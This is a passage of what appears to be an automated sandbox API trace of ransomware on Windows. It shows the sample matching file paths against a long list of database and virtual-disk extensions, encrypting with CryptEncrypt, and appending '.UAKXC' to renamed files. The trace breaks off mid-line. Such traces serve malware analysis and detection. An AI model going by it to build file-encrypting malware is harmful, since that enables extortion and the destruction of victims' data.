[0137.312] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".4dd") returned 0x0 [0137.312] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".4dl") returned 0x0 [0137.312] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".accdb") returned 0x0 [0137.312] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".accdc") returned 0x0 [0137.312] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".accde") returned 0x0 [0137.312] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".accdr") returned 0x0 [0137.312] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".accdt") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".accft") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".adb") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".ade") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".adf") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".adp") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".arc") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".ora") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".alf") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".ask") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".btr") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".bdf") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".cat") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".cdb") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".ckp") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".cma") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".cpd") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".dacpac") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".dad") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".dadiagrams") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".daschema") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".db") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".db-shm") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".db-wal") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".db3") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".dbc") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".dbf") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".dbs") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".dbt") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".dbv") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".dbx") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".dcb") returned 0x0 [0137.313] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".dct") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".dcx") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".ddl") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".dlis") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".dp1") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".dqy") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".dsk") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".dsn") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".dtsx") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".dxl") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".eco") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".ecx") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".edb") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".epim") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".exb") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".fcd") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".fdb") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".fic") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".fmp") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".fmp12") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".fmpsl") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".fol") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".fp3") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".fp4") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".fp5") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".fp7") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".fpt") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".frm") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".gdb") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".grdb") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".gwi") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".hdb") returned 0x0 [0137.314] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".his") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".ib") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".idb") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".ihx") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".itdb") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".itw") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".jet") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".jtx") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".kdb") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".kexi") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".kexic") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".kexis") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".lgc") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".lwx") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".maf") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".maq") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".mar") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".mas") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".mav") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".mdb") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".mdf") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".mpd") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".mrg") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".mud") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".mwb") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".myd") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".ndf") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".nnt") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".nrmlib") returned 0x0 [0137.315] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".ns2") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".ns3") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".ns4") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".nsf") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".nv") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".nv2") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".nwdb") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".nyf") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".odb") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".oqy") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".orx") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".owc") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".p96") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".p97") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".pan") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".pdb") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".pdm") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".pnz") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".qry") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".qvd") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".rbf") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".rctd") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".rod") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".rodx") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".rpd") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".rsd") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".sas7bdat") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".sbf") returned 0x0 [0137.316] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".scx") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".sdb") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".sdc") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".sdf") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".sis") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".spq") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".sql") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".sqlite") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".sqlite3") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".sqlitedb") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".te") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".temx") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".tmd") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".tps") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".trc") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".trm") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".udb") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".udl") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".usr") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".v12") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".vis") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".vpd") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".vvv") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".wdb") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".wmdb") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".wrk") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".xdb") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".xld") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".xmlff") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".abcddb") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".abs") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".abx") returned 0x0 [0137.317] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".accdw") returned 0x0 [0137.318] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".adn") returned 0x0 [0137.318] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".db2") returned 0x0 [0137.318] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".fm5") returned 0x0 [0137.318] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".hjt") returned 0x0 [0137.318] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".icg") returned 0x0 [0137.318] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".icr") returned 0x0 [0137.318] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".kdb") returned 0x0 [0137.318] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".lut") returned 0x0 [0137.318] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".maw") returned 0x0 [0137.318] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".mdn") returned 0x0 [0137.318] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".mdt") returned 0x0 [0137.318] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".vdi") returned 0x0 [0137.318] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".vhd") returned 0x0 [0137.318] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".vmdk") returned 0x0 [0137.318] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".pvm") returned 0x0 [0137.318] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".vmem") returned 0x0 [0137.318] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".vmsn") returned 0x0 [0137.318] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".vmsd") returned 0x0 [0137.318] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".nvram") returned 0x0 [0137.318] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".vmx") returned 0x0 [0137.318] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".raw") returned 0x0 [0137.319] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".qcow2") returned 0x0 [0137.319] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".subvol") returned 0x0 [0137.319] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".bin") returned 0x0 [0137.319] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".vsv") returned 0x0 [0137.319] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".avhd") returned 0x0 [0137.319] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".vmrs") returned 0x0 [0137.319] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".vhdx") returned 0x0 [0137.319] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".avdx") returned 0x0 [0137.319] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".vmcx") returned 0x0 [0137.319] StrStrIW (lpFirst="C:\\Users\\desktop.ini", lpSrch=".iso") returned 0x0 [0137.319] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.319] WriteFile (in: hFile=0x6c8, lpBuffer=0x383fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x383fc78, lpOverlapped=0x0 | out: lpBuffer=0x383fd70*, lpNumberOfBytesWritten=0x383fc78*=0x20c, lpOverlapped=0x0) returned 1 [0137.320] WriteFile (in: hFile=0x6c8, lpBuffer=0x383fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x383fc7c, lpOverlapped=0x0 | out: lpBuffer=0x383fc80*, lpNumberOfBytesWritten=0x383fc7c*=0xa, lpOverlapped=0x0) returned 1 [0137.320] SetEndOfFile (hFile=0x6c8) returned 1 [0137.321] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.321] ReadFile (in: hFile=0x6c8, lpBuffer=0x4610000, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x383fc88, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc88*=0xae, lpOverlapped=0x0) returned 1 [0137.321] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0xffffff52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.321] WriteFile (in: hFile=0x6c8, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x383fc44, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc44*=0xae, lpOverlapped=0x0) returned 1 [0137.321] CloseHandle (hObject=0x6c8) returned 1 [0137.324] GetProcessHeap () returned 0xea0000 [0137.324] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xeecb90 [0137.325] lstrcpyW (in: lpString1=0xeecb90, lpString2="C:\\Users\\desktop.ini" | out: lpString1="C:\\Users\\desktop.ini") returned="C:\\Users\\desktop.ini" [0137.325] lstrcatW (in: lpString1="C:\\Users\\desktop.ini", lpString2=".UAKXC" | out: lpString1="C:\\Users\\desktop.ini.UAKXC") returned="C:\\Users\\desktop.ini.UAKXC" [0137.325] MoveFileW (lpExistingFileName="C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), lpNewFileName="C:\\Users\\desktop.ini.UAKXC" (normalized: "c:\\users\\desktop.ini.uakxc")) returned 1 [0137.326] GetProcessHeap () returned 0xea0000 [0137.326] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecb90 | out: hHeap=0xea0000) returned 1 [0137.326] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4118 | out: hHeap=0xea0000) returned 1 [0137.326] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeac68 | out: hHeap=0xea0000) returned 1 [0137.326] Sleep (dwMilliseconds=0x1f4) [0137.827] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0137.827] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0137.827] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0137.828] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\ie8props.propdesc" (normalized: "c:\\program files\\internet explorer\\ie8props.propdesc")) returned 0x20 [0137.832] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\ie8props.propdesc" (normalized: "c:\\program files\\internet explorer\\ie8props.propdesc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0137.833] GetLastError () returned 0x5 [0137.833] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee398 | out: hHeap=0xea0000) returned 1 [0137.833] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeece00 | out: hHeap=0xea0000) returned 1 [0137.833] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0137.833] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0137.833] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0137.834] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates" (normalized: "c:\\program files\\microsoft office\\templates")) returned 0x10 [0137.853] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates" (normalized: "c:\\program files\\microsoft office\\templates"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0137.854] GetLastError () returned 0x5 [0137.854] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeebe10 | out: hHeap=0xea0000) returned 1 [0137.854] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecd60 | out: hHeap=0xea0000) returned 1 [0137.854] Sleep (dwMilliseconds=0x1f4) [0139.215] Sleep (dwMilliseconds=0x1f4) [0139.747] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0139.747] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0139.748] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0139.748] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\application.ini")) returned 0x20 [0139.749] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\application.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0139.749] GetLastError () returned 0x0 [0139.749] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x383fc88 | out: lpFileSize=0x383fc88*=633) returned 1 [0139.750] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".4dd") returned 0x0 [0139.750] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".4dl") returned 0x0 [0139.750] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".accdb") returned 0x0 [0139.750] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".accdc") returned 0x0 [0139.750] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".accde") returned 0x0 [0139.750] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".accdr") returned 0x0 [0139.750] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".accdt") returned 0x0 [0139.750] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".accft") returned 0x0 [0139.750] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".adb") returned 0x0 [0139.750] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".ade") returned 0x0 [0139.750] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".adf") returned 0x0 [0139.750] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".adp") returned 0x0 [0139.750] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".arc") returned 0x0 [0139.750] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".ora") returned 0x0 [0139.750] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".alf") returned 0x0 [0139.750] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".ask") returned 0x0 [0139.750] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".btr") returned 0x0 [0139.750] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".bdf") returned 0x0 [0139.750] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".cat") returned 0x0 [0139.751] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".cdb") returned 0x0 [0139.751] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".ckp") returned 0x0 [0139.751] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini", lpSrch=".cma") returned 0x0 [0139.751] StrStrIW (lpFirst="C:\\Program Files 